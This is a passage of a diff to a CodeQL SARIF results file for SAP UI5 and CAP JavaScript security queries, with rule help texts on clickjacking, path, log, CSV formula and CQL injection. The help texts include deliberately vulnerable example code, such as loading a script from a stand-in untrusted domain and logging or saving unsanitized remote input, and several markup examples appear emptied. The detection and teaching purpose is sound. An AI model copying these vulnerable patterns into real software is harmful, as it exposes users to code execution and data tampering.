Clickjacking\n\nUI5 applications that do not explicitly set the frame options to `deny` may be vulnerable to UI redress attacks (”clickjacking”). In these attacks, the vulnerable site is loaded in a frame on an attacker-controlled site which uses opaque or transparent layers to trick the user into unintentionally clicking a button or link on the vulnerable site.\n\n## Recommendation\n\nExplicitly set the frame options to `\"deny\"`, either through `window[\"sap-ui-config\"]`, or `data-sap-ui-frameOptions` attribute of the script tag where it sources the bootstrap script `\"sap-ui-core.js\"`:\n\n``` javascript\nwindow[\"sap-ui-config\"] = {\n frameOptions: \"deny\",\n ...\n};\n```\n\n``` javascript\nwindow[\"sap-ui-config\"].frameOptions = \"deny\";\n```\n\n``` html\n\n```\n\n## Example\n\n### Setting the Frame Options to `\"allow\"`\n\nThis UI5 application explicitly allows to be embedded in other applications.\n\n```javascript\n\n\n \n ...\n \n\n \n \n ...\n\n```\n\n### Not Setting the Frame Options to Anything\n\nThe default value of `window[\"sap-ui-config\"]` and `data-sap-ui-frameOptions` are both `\"allow\"`, which makes leaving it untouched allows the application to be embedded.\n\n## References\n* OWASP: [Clickjacking Defense Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html).\n* Mozilla: [X-Frame-Options](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options).\n* SAP UI5 Documentation: [Frame Options](https://sapui5.hana.ondemand.com/sdk/#/topic/62d9c4d8f5ad49aa914624af9551beb7.html).\n* SAP UI5 Documentation: [Allowlist Service](https://sapui5.hana.ondemand.com/sdk/#/topic/d04a6d41480c4396af16b5d2b25509ec.html).\n* Common Weakness Enumeration: [CWE-451](https://cwe.mitre.org/data/definitions/451.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-451" ], + "description" : "The absence of frame options allows for clickjacking.", + "id" : "js/ui5-clickjacking", + "kind" : "problem", + "name" : "UI5 Clickjacking", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "6.1" + } + }, { + "id" : "js/ui5-path-injection", + "name" : "js/ui5-path-injection", + "shortDescription" : { + "text" : "UI5 Path Injection" + }, + "fullDescription" : { + "text" : "Constructing path from an uncontrolled remote source to be passed to a filesystem API allows for manipulation of the local filesystem." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Client-side path injection\n\nUI5 applications that access files using a dynamically configured path are vulnerable to injection attacks that allow an attacker to manipulate the file location.\n\n## Recommendation\n\n### Make path argument independent of the user input\n\nIf possible, do not parameterize the path on a user input. Either hardcode the path string in the source, or use only strings that are created within the application.\n\n### Keep an allow-list of safe paths\n\nKeep a strict allow-list of safe paths to load from or send requests to. Before loading a script from a location outside the application or making an API request to a location, check if the path is contained in the list of safe paths. Also, make sure that the allow-list is kept up to date.\n\n### Check the script into the repository or use package managers\n\nSince the URL of the script may be pointing to a web server vulnerable to being hijacked, it may be a good idea to check a stable version of the script into the repository to increase the degree of control. If not possible, use a trusted package manager such as `npm`.\n\n## Example\n\n### Including scripts from an untrusted domain\n\n``` javascript\nsap.ui.require([\n \"sap/ui/dom/includeScript\"\n ],\n function(includeScript) {\n includeScript(\"http://some.vulnerable.domain/some-script.js\");\n }\n);\n```\n\nIf the vulnerable domain is outside the organization and controlled by an untrusted third party, this may result in arbitrary code execution in the user's browser.\n\n### Using user input as a name of a file to be saved\n\nSuppose a controller is configured to receive a response from a server as follows.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/core/util/File\"\n ],\n function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function() {\n let oDataV2Model = this.getOwnerComponent().getModel(\"some-ODatav2-model\");\n this.getView().setModel(oDataV2Model);\n },\n \n onSomeEvent: function() {\n let remoteResponse = this.getView().getModel().getProperty(\"someProperty\");\n File.save(\"some-content\", remoteResponse, \"txt\", \"text/plain\", \"utf-8\");\n }\n });\n });\n```\n\nEven if the server which updates the OData V2 model is in a trusted domain such as within the organization, the server may still contain tainted information if the UI5 application in question is vulnerable to other security attacks, say XSS. This may allow an attacker to save a file in the victim's local filesystem.\n\n## References\n\n- Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n- Common Weakness Enumeration: [CWE-073](https://cwe.mitre.org/data/definitions/73.html).\n- SAP UI5 API Reference: [`sap.ui.core.util.File`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n- SAP UI5 API Reference: [`sap.ui.dom.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`sap.ui.dom.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeStylesheet).\n- SAP UI5 API Reference: [`jQuery.sap.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`jQuery.sap.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript).\n", + "markdown" : "# Client-side path injection\n\nUI5 applications that access files using a dynamically configured path are vulnerable to injection attacks that allow an attacker to manipulate the file location.\n\n## Recommendation\n\n### Make path argument independent of the user input\n\nIf possible, do not parameterize the path on a user input. Either hardcode the path string in the source, or use only strings that are created within the application.\n\n### Keep an allow-list of safe paths\n\nKeep a strict allow-list of safe paths to load from or send requests to. Before loading a script from a location outside the application or making an API request to a location, check if the path is contained in the list of safe paths. Also, make sure that the allow-list is kept up to date.\n\n### Check the script into the repository or use package managers\n\nSince the URL of the script may be pointing to a web server vulnerable to being hijacked, it may be a good idea to check a stable version of the script into the repository to increase the degree of control. If not possible, use a trusted package manager such as `npm`.\n\n## Example\n\n### Including scripts from an untrusted domain\n\n``` javascript\nsap.ui.require([\n \"sap/ui/dom/includeScript\"\n ],\n function(includeScript) {\n includeScript(\"http://some.vulnerable.domain/some-script.js\");\n }\n);\n```\n\nIf the vulnerable domain is outside the organization and controlled by an untrusted third party, this may result in arbitrary code execution in the user's browser.\n\n### Using user input as a name of a file to be saved\n\nSuppose a controller is configured to receive a response from a server as follows.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/core/util/File\"\n ],\n function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function() {\n let oDataV2Model = this.getOwnerComponent().getModel(\"some-ODatav2-model\");\n this.getView().setModel(oDataV2Model);\n },\n \n onSomeEvent: function() {\n let remoteResponse = this.getView().getModel().getProperty(\"someProperty\");\n File.save(\"some-content\", remoteResponse, \"txt\", \"text/plain\", \"utf-8\");\n }\n });\n });\n```\n\nEven if the server which updates the OData V2 model is in a trusted domain such as within the organization, the server may still contain tainted information if the UI5 application in question is vulnerable to other security attacks, say XSS. This may allow an attacker to save a file in the victim's local filesystem.\n\n## References\n\n- Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n- Common Weakness Enumeration: [CWE-073](https://cwe.mitre.org/data/definitions/73.html).\n- SAP UI5 API Reference: [`sap.ui.core.util.File`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n- SAP UI5 API Reference: [`sap.ui.dom.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`sap.ui.dom.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeStylesheet).\n- SAP UI5 API Reference: [`jQuery.sap.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`jQuery.sap.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-022", "external/cwe/cwe-035" ], + "description" : "Constructing path from an uncontrolled remote source to be passed\n to a filesystem API allows for manipulation of the local filesystem.", + "id" : "js/ui5-path-injection", + "kind" : "path-problem", + "name" : "UI5 Path Injection", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "7.8" + } + }, { + "id" : "js/ui5-log-injection", + "name" : "js/ui5-log-injection", + "shortDescription" : { + "text" : "UI5 Log injection" + }, + "fullDescription" : { + "text" : "Building log entries from user-controlled sources is vulnerable to insertion of forged log entries by a malicious user." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Log Injection\n\nIf an untrusted input, possibly through a UI5 control, is not sanitized and passed onto a logging function, it is possible that a malicious actor submits a crafted input which might lead to forging log entries. If the entries are logged as plaintext, then newline characters may be inserted by the malicious actor. If the entry is interpreted as HTML, then artitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nAvoid directly logging untrusted input from a remote source and sanitize it by replaceing characters so that the input no longer contains control characters and substrings that may be interpreted as HTML.\n\n## Examples\n\nThis UI5 application directly outputs what the user submitted via the `sap.m.Input` control.\n\n``` xml\n\n \n\n```\n\n``` javascript\nsap.ui.define(\n [\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/model/json/JSONModel\",\n \"sap/base/Log/info\",\n ],\n function (Controller, JSONModel, info) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSearchCompleted: function () {\n var oView = this.getView();\n var oSearchField = oView.byId(\"searchTodoItemsInput\");\n var searchValue = oSearchField.getValue();\n info(searchValue); // Sink\n },\n });\n },\n);\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP UI5 Documentation: [namespace `sap/base/Log`](https://sapui5.hana.ondemand.com/sdk/#api/module:sap/base/Log).\n", + "markdown" : "# Log Injection\n\nIf an untrusted input, possibly through a UI5 control, is not sanitized and passed onto a logging function, it is possible that a malicious actor submits a crafted input which might lead to forging log entries. If the entries are logged as plaintext, then newline characters may be inserted by the malicious actor. If the entry is interpreted as HTML, then artitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nAvoid directly logging untrusted input from a remote source and sanitize it by replaceing characters so that the input no longer contains control characters and substrings that may be interpreted as HTML.\n\n## Examples\n\nThis UI5 application directly outputs what the user submitted via the `sap.m.Input` control.\n\n``` xml\n\n \n\n```\n\n``` javascript\nsap.ui.define(\n [\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/model/json/JSONModel\",\n \"sap/base/Log/info\",\n ],\n function (Controller, JSONModel, info) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSearchCompleted: function () {\n var oView = this.getView();\n var oSearchField = oView.byId(\"searchTodoItemsInput\");\n var searchValue = oSearchField.getValue();\n info(searchValue); // Sink\n },\n });\n },\n);\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP UI5 Documentation: [namespace `sap/base/Log`](https://sapui5.hana.ondemand.com/sdk/#api/module:sap/base/Log).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-117" ], + "description" : "Building log entries from user-controlled sources is vulnerable to\n insertion of forged log entries by a malicious user.", + "id" : "js/ui5-log-injection", + "kind" : "path-problem", + "name" : "UI5 Log injection", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "7.8" + } + }, { + "id" : "js/ui5-formula-injection", + "name" : "js/ui5-formula-injection", + "shortDescription" : { + "text" : "UI5 Formula Injection" + }, + "fullDescription" : { + "text" : "Saving data from an uncontrolled remote source using filesystem or local storage leads to disclosure of sensitive information or forgery of entry." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Formula injection\n\nUI5 applications that save local data, fetched from an uncontrolled remote source, into a CSV file format using generic APIs such as [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save) are vulnerable to formula injection, or CSV injection.\n\n## Recommendation\n\n### Escape the leading special characters\n\nCSV cells containing leading special characters such as an equal sign (`=`) may be interpreted as spreadsheet formulas. To prevent them from being interpreted these prefixes should be escaped by surrounding the prefixes with single quotes in order to keep them as literal strings.\n\n### Use a dedicated API function\n\nManual construction of a CSV file using string concatenation is prone to mistakes that can lead to security issues. Instead, a dedicated library function should be used. For example, if the target being exported is a [`sap.m.Table`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.m.Table) and the resulting file is to intended to be opened using a spreadsheet program anyways, then using one of the API functions provided by [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet) is the preferred method of achieving the same exporting functionality.\n\n## Example\n\nThe following controller is exporting a CSV file obtained from an event parameter by surrounding it in a pair of semicolons (`;`) as CSV separators.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/Controller\",\n \"sap/ui/core/util/File\"\n ], function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSomeEvent: function(oEvent) {\n let response = oEvent.getProperty(\"someProperty\").someField;\n let csvRow = \";\" + response + \";\";\n File.save(csvRow, \"someFile\", \"csv\", \"text/csv\", \"utf-8\");\n }\n });\n });\n```\n\n## References\n\n- OWASP: [CSV Injection](https://owasp.org/www-community/attacks/CSV_Injection).\n- Common Weakness Enumeration: [CWE-1236](https://cwe.mitre.org/data/definitions/1236.html).\n- SAP UI5 API Reference: [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet).\n- SAP UI5 API Reference: [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n", + "markdown" : "# Formula injection\n\nUI5 applications that save local data, fetched from an uncontrolled remote source, into a CSV file format using generic APIs such as [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save) are vulnerable to formula injection, or CSV injection.\n\n## Recommendation\n\n### Escape the leading special characters\n\nCSV cells containing leading special characters such as an equal sign (`=`) may be interpreted as spreadsheet formulas. To prevent them from being interpreted these prefixes should be escaped by surrounding the prefixes with single quotes in order to keep them as literal strings.\n\n### Use a dedicated API function\n\nManual construction of a CSV file using string concatenation is prone to mistakes that can lead to security issues. Instead, a dedicated library function should be used. For example, if the target being exported is a [`sap.m.Table`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.m.Table) and the resulting file is to intended to be opened using a spreadsheet program anyways, then using one of the API functions provided by [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet) is the preferred method of achieving the same exporting functionality.\n\n## Example\n\nThe following controller is exporting a CSV file obtained from an event parameter by surrounding it in a pair of semicolons (`;`) as CSV separators.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/Controller\",\n \"sap/ui/core/util/File\"\n ], function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSomeEvent: function(oEvent) {\n let response = oEvent.getProperty(\"someProperty\").someField;\n let csvRow = \";\" + response + \";\";\n File.save(csvRow, \"someFile\", \"csv\", \"text/csv\", \"utf-8\");\n }\n });\n });\n```\n\n## References\n\n- OWASP: [CSV Injection](https://owasp.org/www-community/attacks/CSV_Injection).\n- Common Weakness Enumeration: [CWE-1236](https://cwe.mitre.org/data/definitions/1236.html).\n- SAP UI5 API Reference: [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet).\n- SAP UI5 API Reference: [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-1236" ], + "description" : "Saving data from an uncontrolled remote source using filesystem or local storage\n leads to disclosure of sensitive information or forgery of entry.", + "id" : "js/ui5-formula-injection", + "kind" : "path-problem", + "name" : "UI5 Formula Injection", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "7.8" + } + } ], + "locations" : [ { + "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/ui5/src/", + "description" : { + "text" : "The QL pack root directory." + } + }, { + "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/ui5/src/qlpack.yml", + "description" : { + "text" : "The QL pack definition file." + } + } ] + }, { + "name" : "advanced-security/javascript-sap-cap-queries", + "semanticVersion" : "0.2.0+98e19b0e301f4a2867e6a5c7d8351765387cf40c", + "rules" : [ { + "id" : "js/cap-sql-injection", + "name" : "js/cap-sql-injection", + "shortDescription" : { + "text" : "CQL query built from user-controlled sources" + }, + "fullDescription" : { + "text" : "Building a CQL query from user-controlled sources is vulnerable to insertion of malicious code by the user." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# CQL query built from user-controlled sources\n\nIf a database query is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries.\n\n## Recommendation\n\nCAP's intrinsic data querying engine is immune with regards to SQL injections that are introduced by query parameter values that are derived from malicious user input. CQL statements are transformed into prepared statements that are executed in SQL databases such as SAP HANA. \nInjections are still possible even via CQL when the query structure (e.g. target entity, columns etc.) is based on user input.\n\n## Examples\n\nThis CAP application uses user submitted input as entity and column in a CQL query without any validation.\n\n``` javascript\nconst entity = \nconst column = \nSELECT.from(entity).columns(column)\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n", + "markdown" : "# CQL query built from user-controlled sources\n\nIf a database query is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries.\n\n## Recommendation\n\nCAP's intrinsic data querying engine is immune with regards to SQL injections that are introduced by query parameter values that are derived from malicious user input. CQL statements are transformed into prepared statements that are executed in SQL databases such as SAP HANA. \nInjections are still possible even via CQL when the query structure (e.g. target entity, columns etc.) is based on user input.\n\n## Examples\n\nThis CAP application uses user submitted input as entity and column in a CQL query without any validation.\n\n``` javascript\nconst entity = \nconst column = \nSELECT.from(entity).columns(column)\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n" + }, + "properties" : { + "tags" : [ "security" ], + "description" : "Building a CQL query from user-controlled sources is vulnerable to insertion of\n malicious code by the user.", + "id" : "js/cap-sql-injection", + "kind" : "path-problem", + "name" : "CQL query built from user-controlled sources", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "8.8" + } + }, { + "id" : "js/cap-log-injection", + "name" : "js/cap-log-injection", + "shortDescription" : { + "text" : "CAP Log injection" + }, + "fullDescription" : { + "text" : "Building log entries from user-controlled sources is vulnerable to insertion of forged log entries by a malicious user." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# CAP Log Injection\n\nIf unsanitized user input is written to a log entry using the CAP Node.js logging API, a malicious user may be able to forge new log entries.\n\nCAP Node.js offers a CLRF-safe logging API that should be used for application log entries that are logged as plaintext. If the entry is interpreted as HTML, then arbitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nCAP applications need to care for escaping user data that is used as input parameter for application logging. It's recommended to make use of an existing Encoder such as OWASP ESAPI.\n\n## Examples\n\nThis CAP service directly logs what the user submitted via the `req` request.\n\n``` javascript\nimport cds from '@sap/cds'\nconst { Books } = cds.entities ('sap.capire.bookshop')\n\nclass SampleVulnService extends cds.ApplicationService { init(){\n this.on ('submitOrder', async req => {\n const {book,quantity} = req.data\n const LOG = cds.log(\"nodejs\");\n LOG.info(\"test\" + book); // Log injection alert\n })\n\n return super.init()\n}}\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n", + "markdown" : "# CAP Log Injection\n\nIf unsanitized user input is written to a log entry using the CAP Node.js logging API, a malicious user may be able to forge new log entries.\n\nCAP Node.js offers a CLRF-safe logging API that should be used for application log entries that are logged as plaintext. If the entry is interpreted as HTML, then arbitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nCAP applications need to care for escaping user data that is used as input parameter for application logging. It's recommended to make use of an existing Encoder such as OWASP ESAPI.\n\n## Examples\n\nThis CAP service directly logs what the user submitted via the `req` request.\n\n``` javascript\nimport cds from '@sap/cds'\nconst { Books } = cds.entities ('sap.capire.bookshop')\n\nclass SampleVulnService extends cds.ApplicationService { init(){\n this.on ('submitOrder', async req => {\n const {book,quantity} = req.data\n const LOG = cds.log(\"nodejs\");\n LOG.info(\"test\" + book); // Log injection alert\n })\n\n return super.init()\n}}\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n" + }, + "properties" : { + "tags" : [ "security" ], + "description" : "Building log entries from user-controlled sources is vulnerable to\n insertion of forged log entries by a malicious user.", + "id" : "js/cap-log-injection", + "kind" : "path-problem", + "name" : "CAP Log injection", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "6.1" + } + } ], + "locations" : [ { + "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/src/", "description" : { "text" : "The QL pack root directory." } }, { - "uri" : "file:///opt/hostedtoolcache/CodeQL/2.15.1/x64/codeql/qlpacks/codeql/javascript-queries/0.8.1/qlpack.yml", + "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/src/qlpack.yml", "description" : { "text" : "The QL pack definition file." } } ] + }, { + "name" : "generated/extension-pack", + "semanticVersion" : "0.0.0", + "locations" : [ { + "uri" : "file:///home/runner/work/_temp/codeql_databases/javascript/temp/extension-pack/", + "description" : { + "text" : "The QL pack root directory." + } + }, { + "uri" : "file:///home/runner/work/_temp/codeql_databases/javascript/temp/extension-pack/codeql-pack.yml", + "description" : { + "text" : "The QL pack definition file." + } + } ], + "properties" : { + "isCodeQLModelPack" : true + } } ] }, "invocations" : [ { @@ -3100,9 +3076,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : ".github/actions/install-codeql/action.yml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 5 + "index" : 0 } } } ], @@ -3114,7 +3090,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3126,9 +3102,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : ".github/actions/install-qlt/action.yml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 6 + "index" : 1 } } } ], @@ -3140,7 +3116,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3152,9 +3128,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/cap/ext/ext/codeql-pack.lock.yml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 7 + "index" : 2 } } } ], @@ -3166,7 +3142,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3178,9 +3154,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : ".github/codeql/codeql-config.yaml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 8 + "index" : 3 } } } ], @@ -3192,7 +3168,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3204,9 +3180,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/cap/ext/ext/qlpack.yml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 9 + "index" : 4 } } } ], @@ -3218,7 +3194,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3230,9 +3206,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/codeql-pack.lock.yml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 10 + "index" : 5 } } } ], @@ -3244,7 +3220,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3256,9 +3232,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/ui5.model.yml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 11 + "index" : 6 } } } ], @@ -3270,7 +3246,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3282,9 +3258,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/qlpack.yml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 12 + "index" : 7 } } } ], @@ -3296,7 +3272,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3308,9 +3284,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/additional-sources.model.yml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 13 + "index" : 8 } } } ], @@ -3322,7 +3298,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3334,9 +3310,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/codeql-pack.lock.yml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 14 + "index" : 9 } } } ], @@ -3348,7 +3324,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3360,9 +3336,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/qlpack.yml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 15 + "index" : 10 } } } ], @@ -3374,7 +3350,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3386,9 +3362,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : ".github/workflows/code_scanning.yml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 16 + "index" : 11 } } } ], @@ -3400,7 +3376,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3412,9 +3388,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : ".github/workflows/run-codeql-unit-tests-javascript.yml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/db/schema.cds.json", 